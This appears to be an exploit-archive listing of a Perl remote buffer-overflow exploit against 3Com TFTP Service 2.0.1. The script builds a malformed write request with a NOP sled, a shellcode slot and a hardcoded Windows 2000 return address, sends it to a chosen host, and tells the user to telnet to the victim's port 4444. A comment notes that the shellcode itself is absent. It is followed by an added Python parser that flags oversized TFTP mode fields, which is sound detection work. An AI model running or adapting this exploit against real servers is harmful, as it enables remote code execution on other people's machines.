3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)

Javier Perez 28.02.2007 Verified Vulnerable-App
Remote Exploits Windows

Exploit Code

#!/usr/bin/perl -w
# ===============================================================================================
#                3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
#                               By Umesh Wanve (umesh_345@yahoo.com)
# ==============================================================================================          
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
# Reference : http://www.securityfocus.com/bid/21301
# Date : 27-02-2007
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
# You can replace shellcode with your favourite one :)
# Buffer overflow exists in transporting mode name of TFTP server.
# So here you go.
# Buffer = "\x00\x02"      +  "filename"    +  "\x00" +  nop sled +  Shellcode + JUMP  + "\x00";
# This was written for educational purposes. Use it at your own risk. The author will not be responsible for any damage.
# #
use IO::Socket;

print "\n3COM Tftp long transport name exploit\n";
print "\tCoded by Umesh wanve\n\n";
print "Use: 3com_tftp.pl <host> <port>\n\n";

# Both the host and the port are required (the usage line above documents them).
die "Usage: 3com_tftp.pl <host> <port>\n" unless @ARGV == 2;

# TFTP is UDP; the target host and port come from the command line.
$target = IO::Socket::INET->new(Proto    => 'udp',
                                PeerAddr => $ARGV[0],
                                PeerPort => $ARGV[1])
    or die "Cannot connect to $ARGV[0] on port $ARGV[1]";

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Note: the 344-byte $shellcode string that this comment describes is not present in this
# listing, so $shellcode is undefined below and the packet is built without a payload.

print "++ Building Malicious Packet .....\n";

$nop="\x90" x 129;  

$jmp_2000 = "\x0e\x08\xe5\x77";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)

$exploit = "\x00\x02";                                      #write request (header)

$exploit=$exploit."A";                                      #file name   

$exploit=$exploit."\x00";                                   #Start of transporting name

$exploit=$exploit.$nop;                                     #nop sled to land into shellcode 

$exploit=$exploit.$shellcode;                               #our Hell code 

$exploit=$exploit.$jmp_2000;                                #jump to shellcode 

$exploit=$exploit."\x00";                                   #end of TS mode name

print $target $exploit;                                     #Attack on victim

print "++ Exploit packet sent ...\n";

print "++ Done.\n";

print "++ Telnet to 4444 on victim's machine ....\n";

# milw0rm.com [2007-02-28]
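The script's header comment describes the malformed write request as a two-byte opcode, a filename, a NUL terminator, and then a transfer-mode field far longer than any mode RFC 1350 defines. As an added example, not part of the original exploit or of any 3Com code, the following Python parser decodes a TFTP RRQ/WRQ and flags a mode field that is not one of the standard modes or that exceeds a plausible length. The sample packets and the 16-byte length bound are constructed assumptions; the parser only inspects the first NUL-terminated run of the mode field, which is what a TFTP server would treat as the mode string.

```python
import struct

# TFTP opcodes from RFC 1350.
OP_RRQ, OP_WRQ = 1, 2

# Transfer modes RFC 1350 allows; anything else is unexpected on the wire.
VALID_MODES = {b"netascii", b"octet", b"mail"}

# Assumed bound for the mode field: the longest legitimate mode is 8 bytes,
# so 16 leaves room for odd clients while still catching a multi-hundred-byte field.
MAX_MODE_LEN = 16


def parse_tftp_request(pkt: bytes) -> dict:
    """Decode a TFTP request and collect anomalies; never raises on bad input."""
    result = {"opcode": None, "filename": None, "mode": None,
              "mode_len": 0, "anomalies": []}

    # Smallest possible request: opcode + 1-byte name + NUL + NUL.
    if len(pkt) < 4:
        result["anomalies"].append("short packet")
        return result

    opcode = struct.unpack("!H", pkt[:2])[0]
    result["opcode"] = opcode
    if opcode not in (OP_RRQ, OP_WRQ):
        result["anomalies"].append("not a request")
        return result

    # Filename and mode are NUL-terminated strings; a well-formed request
    # splits into [filename, mode, b""] (RFC 2347 options may follow).
    fields = pkt[2:].split(b"\x00")
    result["filename"] = fields[0].decode("ascii", "replace")

    if len(fields) < 2:
        result["anomalies"].append("missing mode field")
        return result

    mode_raw = fields[1]
    result["mode_len"] = len(mode_raw)
    result["mode"] = mode_raw.decode("ascii", "replace")

    if len(fields) == 2:
        result["anomalies"].append("mode not NUL-terminated")
    if len(mode_raw) > MAX_MODE_LEN:
        result["anomalies"].append(f"mode field too long ({len(mode_raw)} bytes)")
    if mode_raw.lower() not in VALID_MODES:
        result["anomalies"].append("unknown transfer mode")
    return result


def is_suspicious(pkt: bytes) -> bool:
    """True when the request carries any anomaly worth alerting on."""
    return bool(parse_tftp_request(pkt)["anomalies"])


# Constructed sample packets (not captured traffic).
GOOD_WRQ = b"\x00\x02" + b"report.txt\x00" + b"octet\x00"
# Same layout as the header comment: opcode, one-byte name, NUL, then an
# oversized mode field; plain filler bytes stand in for any payload.
BAD_WRQ = b"\x00\x02" + b"A\x00" + b"A" * 300 + b"\x00"

if __name__ == "__main__":
    for label, pkt in (("good", GOOD_WRQ), ("bad", BAD_WRQ)):
        info = parse_tftp_request(pkt)
        print(f"{label}: opcode={info['opcode']} file={info['filename']!r} "
              f"mode_len={info['mode_len']} anomalies={info['anomalies']}")
```

Run over a UDP/69 capture, the same check distinguishes an ordinary write request (`mode="octet"`, no anomalies) from one whose mode field is hundreds of bytes long, which is the condition a detection rule or a hardened server would want to reject before copying the field into a fixed-size buffer.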